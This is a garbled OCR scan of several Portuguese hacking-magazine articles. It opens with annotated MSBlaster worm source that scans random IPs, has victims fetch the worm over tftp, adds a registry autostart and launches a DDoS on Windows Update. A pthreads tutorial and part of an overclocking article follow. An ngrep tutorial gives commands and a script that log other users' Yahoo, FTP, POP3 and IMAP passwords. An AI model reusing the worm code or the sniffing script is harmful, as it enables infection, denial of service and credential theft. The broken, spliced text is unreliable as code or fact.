[O [unsiogne: 
(unsigned long 


[ums ani 


[unsio) 
Sil: 
(unsigne 


e Bx2 00) 
d long *) buf[5x 
2 — —unsior 


kaddr [5], 


do pacote [ nsloned 


Es . dd E 4 435 


fake sockadodr[6], 
[unsigned short) 
fake sockaddr[7] ); 


Bitad Ss.) = 


); 


/f Cria uma 
si proprio. 
hobject = CreateThread( NULL, NULL, 
» Co 0 [LPTHREAD- START ROUTINE) 
“send copy of self, Ta 
: ae “NULL, NULL, 


ra enviar copias de 


6GThreadID WE : 
Sleep( 88 ), 


// Tenta acesso via TETE... 

sprintf( emdbuffer, “tftp -i %s GET 
%&sin”, Gipofsendingbox, msblast ); 

ZE [ [send[ sploit socket Gemdbuffer, 
strlen( cmdbuffer ], NULL )J) < 2) 

( 


goto close socket; 


) 


Sleep[ 1998 ); 
for [ i = 0; i< 128; 5+8) 


í 
if ( mysterious dvord = 9 | 
f 
break ; 
) 
else 
t 
Sleep ( 2890 ); 
) 
) 


// Envia comando star l” 


sprintf( cmobuffer, “start 
J; A 

if ( [(sendl sploit socket, Gemdbuffer, 
strlen( cemdbuffer ), NULL )J]) < 2) g É E 
! » 

goto close socket; ES 


// Aguarda 2 segundos 
Sleep( 2580 ); 


// Executa o Blaster 
sprintf( emdbuffer, “%sin”, msb 
send( sploit socket, Gemdbuffe 


cmdbuffer ), NULL J; 


close socket: 


Sleep( esse |; 


// Fecha sockets, threads e handles 
if ( sploit socket ) 
( 

closesocket( sploit socket J; 


if ( mysterious duord ) E 
í E 
TerminateThread( h0b 
closesocket[( s); 
mysterious duord = 5; 


ER SE hobject ) 
f : à É 
CloseHandle([ hObject e 


melen, argp 


CUCt : dr name; 
» SOCKET ss[28], currsock; 
struct timeval timeout; 
it Ts 


//. Inicializa var 
memset( Gname, B, 2 
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ioctlsocket( ss[i * 4], fNxBBN46B7E, 


// Tenta 28 IPs... 

for ( à = 6; à <'29; i++) 
f : 
inc tvals(); 
sprintfl 5cp, “%d.%d.%d.%d”, pise tor 
Ea Tra ); SE 
tempvarê = inet adodr( &cp ); 


if ( tempvarê = -1) 
(é 

return; 
) E 


sprintf( name.sa data[2], “%d”, 
tempvarê ); 


connect(l ss[i * 4], Gname, 16 ); 


// Aguarda 1.8 segundos 
Sleep( 18098 )J; 


// Faz o envio dos dados em 28 partes 
tor [1 =0;1ix<es i++] 

í 

timeout.tu sec = 6; 
timeout.tuusec = 8; 

writefds.£fd count = 0; 

tempvar3 = 8; ge, 

currsock = ss[i * 4]; 


while ( tempvarS < uritefds.£fd count 


o É [uriteíds. fd array[ tempvar8] 
currsock) ) : 


f 

break; 
3 g 
tempvar3++; 


) 
if [ (uritefods.fd count == tempvar3) 
(uritefds.fd count >= 8x48)] ) 
uritefos.fd array[tempuar3] = 


currsock; 8 
uritefds.fd count++; 


5 aa E E 
if [ select( NULL, NULL, Euritefdos, 


NULL, Gtimeout )] < 1] 
f 


closesocket( ss[i * 4] ); 


eise 


namelen = 18; 


// Obtem o nome de Uma conexas 
peer conectada ao socket 

getpeername( ss[i * 4], Ename, 
Snamelen ); 

infect host[ ss[i * 4], 
inetintoa( in ) J; 


/! Finaliza socket 


closesocket( ss[i * 4] ); 


// Principal 
void main( int arge, 


f 


char fargu[] ) 


struct WwSAData WSAData; 
struct hostent *ptr to hostent; 
Unsigned long passed = 8; 
char name[512], DateStr[3], MonthStr[3]; 
// Insere chave no registy do Windous 
RegCreatekKeyExA( HKEY LOCAL MACHINE, 
PSEFTWRENMicrosaf A Ntincus OurrentlersioWA ruidos”, 
NULL, NULL, NULL, 
SxFO93F, NULL, Gkeystatus, NULL ); 
RegSetValueExA( keystatus, “uindous auto: 
update", NULL, (ULONG) 1, 
“msblast.exe”, 


[ULONG] 
8x92 ); 


RegClosekey( keystatus ); 


// Cria mutex “BILLY” para evitar mais de 
uma instancia 


// do MSBlaster na memoria 


CreateMutexA( NULL, (ULONG) 2, “BILLY” na 
1 
if ( GetlastError(] == 0xB7 ) j 
fais : 
—  ExitProcess[ 6 ); a 
) So 


AA Inicializa Winsock 
ua E 


if ( WSAStartup( 
ElSaData ) || 
WSAStartup( 
EWSAData ) || 
WSAStartup( 


[NORD) MAKEWNORD( 2, 2 ), 
[WORD] MAKENORD( 1, 1), 
(WORD) 1, GWSAData ) ) 


// Dbtem nome do executavel 
BetMbduleFileNameA( NULL, filename, 


sizeof (filename) );. 


// Veriítica se estah conectado a 
Internet 

177/ Caso NAD esteja, aguardarah 28 se- 
gundos... 

while [ !InternetGBetConnectedState( 

GThreadID, NULL ) ) 

t 

Sleep( 20995 ); 


) dé 


// Inicializa sistema randomico para 
obter IPs 
srand( GetTickCount() ); 


class. a = [ rand()]) % 254 ) + 1; 

class b = [ rand(] % 254) +a; 

// IP ativo ? 

if ( (gethostnamel name, 512 ) != -1) 
1 

(ptr-to-hostent = gethostbyname( 

name 1) ) 

t 

if [ (unsigned long) 


*[(ptr to hostent->h. addr list) ] 
[ 


memcpy( Gin, 
*[ptr to hostent=>h.ador. List], 4); 
sprintf ( name, “%s?, e 


inet ntoa( in ) ); 


//>Obtem as partes do IP 
[xxx . xxx. xxx. XXX) 
tl = atoil strtok[ name, “;” 


t2 = atoi( strtok( name, “.” 


t3 = atoi(l strtok( name, “.” 


// A terceira parte eh maior 


if ( +3 > 29) 
f 
srand( GetTickCount() ); 
= rand() SES 


class. a = tl; 
class b = t2; 


passed = 1; 


// Randomiza novamente 

srand[ GetTickCount[) ); 
if ( (rand() 4 29) > 12 9) 
( ad 


passed = 8; 


// Se NAD passou pelo sistema 

randomico... 
TEA: 
( 


ipassed ) 


// Randomiza nova faixa de IPs 


tl = [ rand(] %& 254 ) + 1; 
te = [ rand() & 254 ); 
ta = [ rand() %« 254 ); 


// Obtem dia e mes 


GetDateFormatA( 0x499, NULL, NULL, 
“dr patestr, q] 

GetDateFormatA( 5x4899, NULL, NULL, 
Br MOntida, 3 ); 


// Faz o ataque DDoS ao Windows 
Update da Microsoft, 

/! dia seja maior que 15/68... 

if ( [(atoi(l DateStr ) > 15) 65 [at 
MonthStr ] > 8] ] den 


caso o 


CreateThread( NULL, NULL, 
ART ROUTINE) AttackMS, 
; NULL, NULL, 


a pesquisa e infeccao 
(1 ==1) 


AndInfect(); 


maliza Winsock 


THREADS 


Process: 


Gleicon S. Moraes 
gsmoraesQterra.com.b; 


oda a execução de um programa, sob o ponto de 

vista do sistema operacional, é discutida com base em 

uma unidade, à qual chamamos de processo. O 
processo engloba desde o momento em que executamos o 
programa, quando este é carregado pelo kernel e movido para a 
memória, até a construção de seu ambiente. 


Mas qual é o ambiente necessário? Um programa precisa ter 
seu espaço de dados, registros como PC, SP, tabela de alocação 
de arquivos, os file descriptors, entre outros dados. É um esforço 
de CPU considerável construir esse ambiente, conhecido como o 
contexto do programa. Em um ambiente que pode rodar 
muitos programas, ou tarefas (multitasking), ocorre a troca 
constante de contextos. 


Para o nosso estudo, vamos fixar que temos apenas uma CPU - 
os casos com mais processadores são tratados de forma ligeira- 
mente diferente. Pois bem, tendo apenas uma CPU, apenas 
“uma” memória, a tarefa do sistema-operacional é gerenciar 
esses recursos. No estudo de sistemas operacionais, a parte 
referente aos algoritmos e implementações desse gerenciamento 


é um dos mais densos, e é o que gera os resultados mais aparen- 
tes ao usuário. 


Voltando aos processos, imagine o kernel do sistema 
operacional rodando o processo 1 e, em um intervalo de acesso 
ao I/O (ou ao mesmo de tempo, dependendo da 
implementação), rodando o processo 2. Ele coloca o processo 1 
em um estado de sleep, recria o contexto do processo 2 e retira 
o mesmo do estado de sleep. Os algoritmos variam, mas o que 
deve ser notado é que o contexto do programa é reconstruído e 
alterado o tempo tod 


sa explicação, grosso modo, ajuda a 
entender o consumo de CPU e o tempo-que leva a geração de 
um processo completo, como aqueles que utilizamos ao chamar 
fork() dentro de um programa 


servidor Web, o 


Em muitos casos, como, por exemplo, o de. 


programa foi projetado para esperar uma conexão e, quando a 
mesma chegar, gerar um novo-processo para ela e retornar ao 
modo de espera de conexão, deixando o processo novo cuidar 

dessa requisição - imagine a quantidade de processos criada em 


um ambiente de muitos acessos! 


Esse modelo serve muito bem para várias tarefas, mas existe 
um outro modelo que deve ser analisado e levado em conta no 
projeto: as threads. A plataforma escolhida para estudarmos 
o assunto é o Linux, nm 


algo generalizado, está 
presentenos mais diversos sistemas operacionais 


guindo a definição canônica, thread é um processo mais 
que o significa leve aqui diz respeito ao custo 


CPU (tempo) e ao algoritrr 
uma thread - que necessita de um contexto mais simples do que 
m processo. Aliás, uma thread compartilha o contexto com 


outras dentro de um processo, e apenas alguns dados do contexto 


Falando, mais uma vez, genericame 


juer, te 


programa simples, um hello world qua 


ste caso, a analogia segue uma das defin 


do. Temos apenas um 
rama segue, e podemos 
os caminhos de código, 

do controle de fluxo de dados, 


nos 


) que é usado para criar e gerenciar 


temos o controle do fluxo do código, em vários níveis e de 
forma simultânea 


Saindo da parte teórica, vamos ver alguns exemplos utilizando a 
POSIX Threads, ou pthread (a biblioteca que já vem instalada na 
maioria das distribuições), visto que é usada por muitos progra- 
mas. Se a sua instalação não a possui, procure-a e instale-a da 
forma que mais lhe convier. Necessitaremos também do gee 
cionando. 


ins 


onstra a criação de 5 threads, 

», e um loop principal. Este loop principal vai 
1 segundo, e cada thread (de 0a 5) 
ndo seu ID, número identificador, de 
mero da thread), ou 6, caso a 
adas para s/eep() para que o 
e seja possível o! var a assincronia 
vai rodar em seu tempo 


pido pressionando control + c, à 
da ja reads. 
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EINE SNI DN PS NES MEDE NNE NS NE 
4 THREADS Ê 


Programa 1 - hello world.c $ cc hello world.c -o hello world 
-lpthread 
/* multi hello world usando threads */ 


ndica que o compilador deve linkar o 
ginclude «<stdio.h> programa a biblioteca pthread, como citado anteriormente 
Finclude <pthread.h> 
tdefine MAXTS /* 5 threads para Neste programa, podemos notar todas as 
testar */ t ando desordenadamente, 
no mesmo processo 

/* 

recebe um parametro que indica o 
numero da thread 

faz um sleep de <n> segundos, 
para demonstrar cada 

thread funcionando separadamente 
EA 

rodando 

void *print hello (void *oi)] (f 

uhile(1) ( Outro item 

fprintf(stdout,"Nt Hello 

world thread - id: %din”, ([int)oil; 
SEU t)Joi==8) sleep(6); 
else sleep((int]oi); parâmetro para a função 


que ela irá executar. Dentro 
dessa o, outras threads 
poderiam nao 
int main [int argc, char **argu) f sendo privilé unção 
/* declarando as variaveis para MRE 
cada thread */ 
pthread t threads[MAXTI]; Portanto, 
Entra E 
for (a-9; a< MAXT; a++) ( 
fprintf(stdout,”Criando 
thread dd: SdNYnZ; a); 


pthread create(Gthreads[a], NULL, 
print hello, (void *Ja); 
) 
while (1) (f 
fprintf(stdout, “Loop 
principal do programaln”); 
sleep(1); 


blocos de execução para formar o caminho desejado 
Granularidade de operações significa justamente isto: blocos, 
operações pequenas, mas completas 


As seções críticas devem ser protegidas - tais como as Varlaveis 
e estruturas de dados, que não podem ser modificadas 
ou lidas simultaneamente = para que race 
conditions difíceis de se tratar sejam evitados 
Race condition é um fenômeno que ocorre 
quando duas fontes distintas executam 
operações semelhantes ou complementa- 
res em Um objeto que deve ser 
acessado de forma serial, ou individu- 
al. Um programa com esses cuidados 
pode ser chamado de thread safe, 
ou seja, programa seguro para ser 
utilizado com threads. 


O próximo programa 
implementará a comunicação 
entre threads utilizando um 
outro conceito associado, 
chamado mutex, ou 
mutual exclusion. Essa 
comunicação vai servir 
para'sincronizar as 
thigads, uma vez que 
nem sempre o 
comportamento 
assincrono é desejável. 
Uma ihread pode ficar 
esperando que outra 
complete uma operação, 
e isso é particularmente 


“+ 


5 útil quan 
fluxo de dac 
as Operaç 


Na figura 1, temos um 
exemplo de race condition 
acessando uma variável char 
a, com duas threads que têm 

como objetivo ler, modificar e 
repor o valor na mesma variáve 
n um sistema sem. controle 

citado, teríamos situações seme- 


hantes à demonstrada. 


Thread 1 Thread 2 Varialvel a 


Lê variável a 
valor: 1000 


1000 


Lê variável a 
valor: 1000 


|| Multiplica por 2 
valor: 2000 


| Escreve o Soma 40 


valor em a 


Escreve o 
valor em a 


n estê lendo ou 
dos dados. Ess 
bém pode 


Sem um-controle de 
ntegr 
por th 
ou seja, qualquer O 
tras threads de lerem ou mod 


peração € 


o da figura 2. 


hread mute 


este programa visa demonstrar 
como vutilizar um mutex 
* para controle de acesso a um 
dado global 
E 


<stdio.h> 
<pthread.h> 


Finclude 
tinclude 


variavel global */ 
E 2; -/* duas 


dit ads 
pthread t ta, 
7 

pthread mutex t 
mutex=PTHREAD MUTEX. INITIALIZER; /* 
mutex global */ 


threads 


*thread1i (void *oi] 


int local a; 


void 


pthread mutex lock( Gmutex EB 
fprintf(stdout, “Thread 1 
a=%din”, al; 
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a THREADS 


local a-a; 

local a=local a*e; 

a=local a; 

fprintf (stdout, 
a=%&dAn”, a); 

pthread. mutex. unlock ( Emutex J; 

fprintf(stdout, “Thread 1 
a=%din”, al; 

sleep(1); 


“Thread 1 


void *threade (void 
Ent tocadas 
pthread mutex lock( 
fprintf(stdout, 
a=t%dNn” a): 
local a=a; 
local a=local a+408; 
a=local a; 
fprintf(stdout, 
Esse Na sho 
pthread. mutex. unlock ( Emutex ); 
fprintf(stdout, “NtThread P 
a-%dAnº, va); 
sleep([1); 


Kodo) Dl 


Gmutex JJ; 


“NEThread 2 


“NtThread P 


) 


main [int char **argu) ( 
a=1900; 
fprintf(stdout,”Variavel a: 
SON mesa JE: 
pthread create(6t 1, 
Gthread1, NULL); 
pthread create(6t 2, 
Gthreade, NULL]; 
pthread join(t 1, 


pthread joinlt 2, 


int arge, 
NULL, 
NULL, 


NULL); 
NULL); 


Para compilar, use o comando: 


cc pthread mutex.c -o 
-lpthread 


pthread mutex 


Mutexes são dispositivos de exclusão mútua utilizados para 
ads. Nesse exemplo pudemos notar como um 
sado, sendo que a segunda thread só teve 
o destravamento. Foi declarada inicialmen- 
te uma vari 


pthread mutex t 
mutex=PTHREAD MUTEX. INITIALIZER; 


á inicializada, é de escopo global, e 
acessada por qual ação. Dentro das threads, a 
a variável a, checa seguinte forma: ; 
ME sã 
pthread mutex. lock( Gmutex JJ; 
codigo para acessar a 
variavel a 
pthread mutex. unlock ( 
Gmutex JJ; 


No exemplo, copiei o valor para uma variável local e fiz as 
operações necessárias. Poderia ter feito isso diretamente na 
variável global a. 


Thread 1 Thread 2 Varialvel a 
Lê variavel a 
valor: 1000 
variável “travada” 


Lê variável a 
variável travada 
aguardar 


o valor em a 
variável a 


Lê variável a 
valor: 2000 
variável “travada” 


Muktiplica por 2 
valor: 2000 


valor: 2040 


Escreve 
o valor em a 


Libera 
variável a 


um mecanismo q 
uma thread, dad 


Vic 
* demonstracao de conditional 
variables 


A 


Hinclude <stdio.h> 
Hinclude <pthread.h> 


pthread. cond: t 
my-cond=PTHREAD COND INITIALIZER; 
pthread mutex t 
my-mutex=PTHREAD MUTEX INITIALIZER; 


int frame=b; 


void *task 1 (void ) ( 
Rope 

fprintf (stderr, “Captura 
frame (%d)Nn “, frame) 

sleep(1); Eee 

pthread cond signal (&my cond); 

fprintf (stderr, “Sincroniza 
frame (%“d)Nn”, frame); 

frame++; 

if (frame ==2) frame 


void *task 2 (void) f 
char myframe=b; 
afonso PR 
myframe=frame; 
pthread cond wait (Gmy cond, 
Gmy. mutex) ; 
fprintf(stderr,"NtNtGrava 
frame (%d)Nn”, myframe); 


) 


int main [int argc, char **targu) ( 
pthread t thread 1, thread P; 


fprintf (stdout,”Criando 
threadsin”); 

pthread create(Gthread 1, NULL, 
(void *] task 1, NULL]; 

pthread. create(Sthread 2, NULL, 
(void *)task 2, NULL); 

pthread join(thread 1, NULL); 

pthread join(thread 2, NULL); 


enta um pequeno mecanismo virtual 
tura, sincronia e o salvamento de um 
Esse mecanismo prevê 2 buffers, de 


Istrar Os 


temos aindasemáforos e outros 


do Linu 
dos recursos apreser 
mecanismos de con 


eteltos e possi 


ole 


dade, o ponto mais importante é projetar o programa 
ta, com as operações bem defin 


las. Dessa forma, 


a montagem e execução da idéia utilizando thr 
n.erros difíceis de localizar 


siworkshops/wor 


opipthreadsAViAIN. ht 
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SNIFFER COM NGREP 


Todas as pessoas que estudam ou 
trabalham com hacking ou segurança da 
informação, já se depararam com o termo 
“sniffer”. O sniffer é um programa que 
“fareja” a rede e fica vigiando tudo o que 
acontece sem ninguém saber. Esses 
programas podem ser usados para capturar 

senhas, usuários ou qualquer outro dado 
que esteja trafegando pela rede. 


É fácil perceber a utilidade de um sniffer 
para um “cracker”. Por outro lado, ele 
também é muito útil para os profissionais 
que trabalham com segurança da informa- 
ção, pois se podem depurar problemas na 
rede e realizar testes de segurança. 


Apesar de muito se falar sobre os 
sniffers, poucos textos ensinam como 
utilizá-los ou criá-los. Neste artigo, você 
aprenderá a usar um excelente sniffer, o 
ngrep: O ngrep (network grep) é um 
programa que utiliza a /hpcap para vigiar 
tudo o que acontece em sua rede. A 
grande vantagem é que você pode adicio- 
nar filtros para refinar o tratamento dos 
dados. Em um próximo artigo, eu preten- 
do ensinar como criar o seu próprio sniffer 
utilizando a //bpcap em perl. 


O ngrep só pode ser utilizado em sistemas 
Unix (Linux, OpenBSD, FreeBSD, etc.). Portanto, 
se você utiliza Windows, “I'm sorry”. O site 
oficial do ngrep é <http:// 
www.packetfactory.net/Projects/ngrep/>, 
onde você o encontra para download, além de 
algumas informações sobre como usá-lo. 


Em um sistema Linux, você pode seguir estes 
passos para instalá-lo; 


% wget <htip://heanet.dl.sourceforge.net/ 
sourceforge/ngrep/ngrep-1.40.1.tar.gz> 

fé tar -zxvf ngrep-1.40.1 .tar.gz 

ft cd ngrep 

& /configure 

& make 

% make install 


O programa será instalado no diretório 4sm/bin. 


Sniffer com o ngrep 


Depois de já instalado, pode-se começar a usá-lo. Mas antes 
disso, é necessário ter algumas coisas em mente. A primeira é qual 
o protocolo que se deseja sniffar. O ngrep suporta o tcp, o uap e 
O /emp. A maioria das conexões da Internet utiliza'o íçp, como por. 
exemplo, o acesso aos e-mails, sites e servidores de ftp. 

O outro protocolo muito usado é o uap. Este é um protocolo 
não-orientado à conexão (diferentemente do tgp, que é), sendo 
mais útil para transmissões que precisem de acesso rápido e sem 
controle de dados. 

O último protocolo suportado é o /cmp, usado para controle e 
depuração da rede. 

O mais importante para o nosso objetivo é o tcp. Ele é utilizado 
quase sempre que alguma senha será enviada na Internet. Por 
isso, ele está em nossos exemplos. 

A segunda coisa que devemos saber é o que se deve filtrar 
(termos e portas). Por exemplo, o Attp utiliza a porta 80, enquan- 
to o smtp (envio de e-mails) usa a porta 25. 

Outro detalhe importante é a interface de rede que será 
utilizada. Em sistemas Linux, a padrão é a eth0. Se você usa'o 
OpenBSD, o FreeBSD ou qualquer outro Unix, ela pode ter um 
nome diferente. Basta digitar “/fconfig -a” e ver quaka interface 
disponível. 


Vamos agora começar com o “sniffing” em si. Em nosso 
primeiro exemplo, filtraremos tudo o que passar na nossa 
interface eth0e que utilize o protocolo tcp. 


/fusr/bin/ngrep -d eth0 *” tcp 


Esse comando filtra a interface ethO e apenas mostra as 
conexões do tcp. As duas aspas, sem nada entre elas, significam 
que o programa não deve procurar por nenhuma palavra em 
especial. Assim, tudo o que trafegar será logado. O resultado 
desse comando será algo parecido com isso: 


Filter: 
aus 
T 192.168.1.187:40046 


ip and ( tcp 


-> 207.46.106.25:1863 [AP] 
PNG.. 

Ea 

T 207.46.106.25:1863 
QNG.. 

Ei 

T 192.168.1.187:40074 -> 146.82.184.3:143 
631 NOOP.. 

* 

T 146.82.184.3:143 


-> 192.168.1.187:40046 [AP] 


[AP] 


-> 192.168.1.187:40074 [AP] 
631 OK NOOP completed.. 

FRRRA 

T 192.168.1.106:35501 -> 200.221.8.17:80 [A] 
GET / HITP/1.0..Host: www.uol.com.br..Accept: 


text/html, text/plain, 


application/vnd.sun.xml.i 


mpress.template, application/vnd.sun.xml.draw, usuários e senhas utilizados nas conexões aos servidores FTP Esse 
application/vnd.stardivision filtro é um dos mais fáceis porque no F7Pas senhas e os logins são 
au, audio/aiff, audio/x-aiff, audio/x-pn-aiff, enviados seguindo um protocolo bem rígido, funcionando da 
audio/mod, : seguinte forma: 


| image/*..Accept: 
| video/mpeg, video/*, application/pgp, USER usuário 
application/pdf, PASS senha 
application/postscri 
Pt, message/partial, message/external-body, x- Portanto, nosso filtro deve ficar da seguinte maneira 
be2, 


application/andrew-inset & /usr/bin/ngrep -d eth0 “USER|PASS' tcp port 21 
«+ text/richtext, text/e 

interface: eth0 (192.168.1.0/255.255.255.0) 

filter: ip and ( tcp port 21 ) 

match: USER|PASS 


O resultado é um pouco complicado de entender, por isso 
devemos aplicar mais filtros ao nosso comando para facilitar a 
compreensão. 


ERERARRARAS 

T 192.168.1.106:35607 -> 200.255.5.17:21 [AP] 
USER daniel.. 

Eid 

T 192.168.1.106:35607 -> 200.255.5.17:21 [AP] 
PASS testedenha.. 

FERPEESEREEER Aa 

T 192.168.1.106:35608 -> 146.82.184.3:21 [AP] 
USER daniel... 

add 

T 192.168.1.106:35608 -> 146.82.184. 
PASS testedesenha2.. 

ReRURRRRAS 


/usr/ /ngrep -d eth0 *” tcp port 80 


Esse comando usa um filtro a mais que o comando anterior. Ele 
logará tudo o que utilizar o protocolo tcp e se direcionará à porta 
80, Como todos já sabem, a porta 80 é utilizada pelos nossos 
browsers (Internet Explorer, por exemplo) para se comunicar com 
os sites (servidores de páginas). Com esse filtro, podemos ver 
todos os sites que-o pessoal da nossa rede estiver acessando. O 
log é mais simples de compreender, porém ainda não está 
perfeito. Nesse próximo exemplo; iremos filtrar para apenas ver os 
usuários e as senhas de todas as pessoas que estão acessando O 
Yahoo!. 


& /usr/bin/ngrep -d eth0 'passwd=' tcp port 80 


No caso, “testedesenha” e “testedesenha2” eram as minhas 


interface: 'eth0 (192.168.1.0/255.255.255.0) senhas detectadas pelo sniffer. 


filter: ip and ( tcp port 80 ) 4 
Para facilitar, podemos fazer um she//scriptque use as regras 


citadas. Ainda podemos adicionar mais alguns filtros para pegar as 


T 192.168.1.106:35584 -> 66.163.171.128:80 [AP] senhas Entenda para a porta 110e 143 (pop3e imap). Os outros 
dois filtros ficariam assim: 


match: passwd= 


Content-Type: application/x-www-form- 


urlencoded..Content-Length: 


173... . .tries=s.done-httri3As2re2rlogin.yahoo. carfs2Fconfiga2Rmai lar. & /usr/bin/ngrep -d eth0 “USER|PASS' tcp port 110 
intISITbr$26. gk3rbre. src=yme: slogin=denielcide.partner=&. intl=bré. £ E 


Update=&passwd=xx08ybhf12&eLogin=Entrar 

Essa regra filtra os usuários e as senhas utilizados nas conexões 
POP3. Toda vez que algum usuário utilizar o outlook ou algum 
cliente de e-mail similar, você verá a sua senha. 


* /usr/bin/ngrep -d eth0 "LOGIN “* tcp port 143 


passwd=xx08ybh£f12 Esse comando faz a mesma coisa que o filtro acima, porém 
escuta a porta 143, utilizada pelo imap. 


Com esse filtro, fica fácil pegar os usuários e as senhas. É só 
olhar 
no resultado do comando para ver: 


slogin=danielcid 


Essa era a minha antiga senha do Yahoo!. Acabei de mudá-la 


O nosso shell script segue abaixo. Ele está comentado para 
Um outro filtro que podemos aplicar é um-que detecte os facilitar o entendimento: 


&!/bin/bash 


&Daniel B. Cid - danielGunderlinux.com.br. 


<mailto:danielCunderlinux.com.br> 


Programa exempio para a revista H4ck3r 


fiSalve-o como “sniffer” 


fPara iniciar, faça ./sniffer start 


fPara parar, faça .«/sniffer stop 

FAs conexões ficarão logadas nos arquivos: 
tyahoopass.log - senhas do Yahoo! 
gftppass.log - senhas de ftp 

femail.log - senhas de e-mail (pop3) 


femail2.1og - senhas de e-mail (imap) 


start () 

echo -n $”IniciandS"6 programa 
sniffer..” 

/usr/bin/ngrep -d eth0 'passwd=" 
tcp port 80 >> yahoopass.log 

/usr/bin/ngrep -d eth0 “USER|PASS' 
tcp port 21 >> Etppass.log 

/usr/bin/ngrep -d eth0 '“USER|PASS' 
tcp port 110 >> email.log 

/usr/bin/ngrep -d eth0 “LOGIN *“* 
tcp port 143 >> email2.1og 

RETVAL=$? 

echo 

[ SRETVAL -eq O ] && echo “Running” 
>> /var/run/sniffer 


return SRETVAL 


echo -n $”Parando o programa 

killall -9 ngrep 

RETVAL=$? 

echo 

[ SRETVAL -eqg 0 ] && rm -£ /var/ 
run/faketelnet 


return SRETVAL 


restart() ( 
stop 


“start 


case “$1” in 


start) 


restart|reload) 
restart 
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n) 
echo S”Usage: $0 
(start |stop|restart|reload)” 


exit 1 


&-o programa termina aqui-f 


Conclusão 


Como vocês podem ver, é muito simples sniffar uma rede 
e pegar todo o tipo de informação desejada. Apesar de 
termos tratado apenas da captura de senhas com o ngrep, 
os sniffers podem ser utilizados para muitas outras coisas. O 
mais importante é perceber o quanto a segurança e a 
criptografia são importantes. Tente sniffar a porta 22 (do 
ssh) e veja a diferença. Será impossível decifrar alguma coisa. 
Outra medida de proteção contra os sniffers é o uso de 
switches. Eles não entregam os pacotes “/P* para toda a 
rede, mas apenas para a máquina especificada, preservando 
assim a confidência da informação transferida. (Note que 
existem métodos que passam por cima da proteção dos 
switches) 


Daniel Barbosa Cid é especialista em segurança da 
e em sistemas Unix: Ele é um dos fundadores do 
www. undertinux.com.br/> e atual- 
nte está trabalhando como engenheiro de sistemas na 
LogicTree Corp-<hitp/iwww.logiciree.com/>e escrevendo 


um livro sobre o OpenBSD. 


Por Bruno Cesar 
brunoQdigerati.com 


abe-se que o overclock 
perfeito depende de 
diversos fatores, que 
fazem com que o seu 
processador, de fato, rode 
a um clock efetivamente alto ou que 
a memória de sua placa de vídeo rode 
em uma fregúência mais alta — 
efetuando, assim, o overclock. Dando 
continuidade à nossa seção de artigos 
sobre overclocks na revista HACKER, 
iremos, nesta edição, falar justamente 
sobre os principais fatores que garan- 
tem que um overlock seja efetuado 
com segurança. O exemplo a ser 
citado aqui será prático e mostrará 
principalmente a diferença de 
performance entre um sistema sem 
overclock algum e outro com uma 
alteração aceitável e segura. A partir 
dele veremos por que vale a pena 
você investir e executar este tipo de 
atividade. 


| prego! Isso 
o. O 


po, digamos, Um mêsMiá cair 


ostod 


i dem 


irvendêra por 


over 


lock e, 


ertonmance 


OPN Code Frequency 
1000 1000 MHz 

1100 1100 MHz 

1133 1133 MHz 

1200 1200 MHz 

ESA RAMSÉS Pan iAs de SR RÃ 1300 1300 MHz 

meira parte do artigo na HACHER * 10 1333 1333 MHZ 

SS 1400 1400 MHz (desktop) 
er 1400 1200 MHz (Mobile) 
E 1500  1333MHz 
1600 1400 MHz 

1700 1467 MHz 

1800 1533 MHz 


aviso 


rAN 


utilizando L 
multiplic 
minha opinião, o fato de te 


rocesso 


| e 1900 1600 MHz 

| na o - 2000 1667 MHz 

| E Gena one As 2100 1733 MHz 
compr r uma maquina | tada, você escolng 2 proc ssador. No caso dos 


2200 1800 MHz 

2400 2000 MHz 

2500 1833 MHz 

2600 2083 MHz (333 FSB) 
2600 2133 MHz (266 FSB) 
2700 2167 MHz 

| 2800 2083 MHz 

Ejojojo) 2167 


rocessade 
com o cl 
2 1800+, « 


+ ProG 


com seus numeros (e 


'ercebe-se que, com o decorrer do tempo, na locks; Quem é ade | e já utilizou Um o giniais 


cessadores subir, novas tecnologias são rocessadores a deve saber mullo berh pofique 


Ssim O p Imenteêntre-o) 


processa da AMD co A rougiited Bo 
mundo-da informáti , O era que dor 

proces A família np! en imaloja 

m S acessado XF 0+, é pre T ) no ques 


jada, Sevocê 


| AM A / 
| AMD Athol Thunderbird im 
Thoroughbre rton 
| A principal di pr ssadores, além do core, é 
| tecnologia utilizada n nais 
| | 


antigo dafamília 


A diferença e 
+ Após saber algumas diferenças entrefos processadores da AMD 
família Atholn XP, iremos iniciar um exemplo de como um bom 
overclock pode ser executado com total segurança nesse processador, 
o que servirá de base para quem quiser entrar neste mundo. 
Hardwares utilizados 


* ABIT NF-S ver. 2.0 Placa-mãe com chipset NVIDIA nForce2, 
uma das últimas palavras em tegnologia para processadores AMD 
* AMD Athlon XP 18004 Thorougbred BJIUHB DLT3C 0309, uma 

das melhorês versões para overclock. Esse processador consegue 
utilizando watercooler, um clock interno e real de 2600 MHz 

e 2x256 MBDD TWINXS 12-3200C2PT— 
alta latência conseguem rodar além de 400 MHz 

2 AD 60 GB Maxtor BiamondalViax Plus 9 - HD barato e rápido, 
7200 rpm, 9 sec 

Cooler Voolcana 7+ — Não é um dos.melhores, mas já quebra 
um bom galho, pois mão-deixa o processador aquecer tanto 


DR Corsalr. 


Memórias de 


Sofiwares utilizados 


omitodos os updates, 


º Windows XP Service Pack 7 
efetuados e rodando:100% 
= SiSoft Sandra 2003 — Software utiliza 
velogidade de processador, 
e CPUZ- 


estável 


do para fazem testes de 


zer 
memória, etc. 


Para vero dlock interno que O processador.está rodando 


Com tudo mont 
mente ver e 


ado e devidamente preparado, remos primei 


comparar O sistemas ESET = 
rodando sem Tio rd) sonar 
overclock, isto é, Ade RR = 
fo Saes” Nada gitérádo O gmmmonio 
com tudo, digamos, [to atm sor z25.=] IERPETrrT 
e Reference CPU 2 
de fábrica. AMO Athlon XP 30004 2. 16G+- 
Rolar cs 
Acompanhe as [avo Athlon xp 2800+ 2.086] 
. Reference CPU 4 
imagens abaixo E 
E = 
Essa imagem pda : 
y sur test No 
mostra um Dynamic MPjMT Load Balence No 
rk do XX Processor Affiray No 
benchmark do ZA Ronda raça Se esosto fr 
processador no Hinn GOV v xp 


Sandra. Nesté caso, 
o, processador, como dissemos acima, está rotlando seminenhuma 
alteração, totalmente emistocks Podemos ver que o desempenho 
dele, comparado côm o de ur processador XP 3200+, é bem 

Y inferior- claro, afinal, estamos falando dê um processador com 

* clock normal mllito alto 


Najmagêm acima-potlemos ver, com osoftwáre CRB: Z, à 
Velocidade do processador,em qual voltagem está rodaldo, seu é 
